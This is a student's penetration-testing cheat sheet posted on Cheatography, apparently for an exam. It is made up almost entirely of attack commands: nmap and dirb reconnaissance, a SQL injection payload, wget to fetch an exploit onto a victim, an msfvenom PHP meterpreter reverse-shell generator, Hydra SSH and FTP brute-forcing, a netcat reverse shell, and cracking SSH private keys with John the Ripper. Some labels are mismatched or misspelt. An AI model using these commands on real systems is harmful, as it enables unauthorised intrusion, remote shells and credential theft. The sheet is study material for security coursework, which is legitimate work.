Cheatography
https://cheatography.com
my first attempt in making a cheat sheet for my exam
Information Gathering | Enumeration
find the ip address and subnet |
ip a |
host discover |
nmap -sn [ipv4]/24 |
services discovery |
nmap -sT -sV -A -T5 -O -p1-65535 [ipv4] |
dirb |
dirb http://[ipv4] [wordlist] |
nikto |
nikto -url http://[ipv4] |
look for users |
enum4linux [ipv4] |
view content 1 |
strings [filename] |
view content 2 |
file [filename] |
Exploitation | Post Exploitation
search exploits |
searchsploit |
syntax of scp |
scp -p [port] "user@ip:/[dir]/[file]" [dir] |
information about the device |
uname -a |
get the current user |
whoami |
get the uid of the user |
id |
ssh using private key |
ssh -i id_rsa user@localhost |
sql injection |
‘ or 1=1# ‘ 1 or 1=1# |
install exploit on victim |
wget URL/filename |
compile exploit |
gcc filename.c -o exploit |
create a reverse_shell php file |
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw> reverseshell.php |
|
|
Hydra
-l |
user |
-L |
username file |
-p |
password |
-P |
password file |
-s |
port |
-f |
Terminate program if pair login:pass is found |
syntax for ssh |
hydra -l user -p password 192.168.1.1 ssh |
syntax for ftp |
hydra -l user -p password 192.168.1.1 ftp |
NC
nc [target ip] [target port] |
listening to a specific ip and port |
nc -e /bin/sh [IP] [Port] |
listening to a specific ip and port with bash |
|
|
Ports
ftp |
20-21 |
ssh |
22 |
http |
80 |
Internet Relay chat [can be backdoor] |
6667 |
john
changing id_rsa to john format |
python /usr/share/john/ssh2john.py id_rsa > johnFormat |
attempting to decrytp id_rsa john format |
jhon johnformat |
—wordlist=”rockyou.txt” |
adding the wordlist |
—format=”NT” |
choosing the format |
—single |
set the single crack mode |
--incremental |
set incremental mode |
—show |
use to cracked password file to be shown |
—rules |
word mangling rules |
single crack mode |
quick, guesses the password, use for common username and password |
wordlist mode |
text files needed with list of passwords [dictionary attack] |
incremental mode |
brute-force, time consuming |
|
Created By
Metadata
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets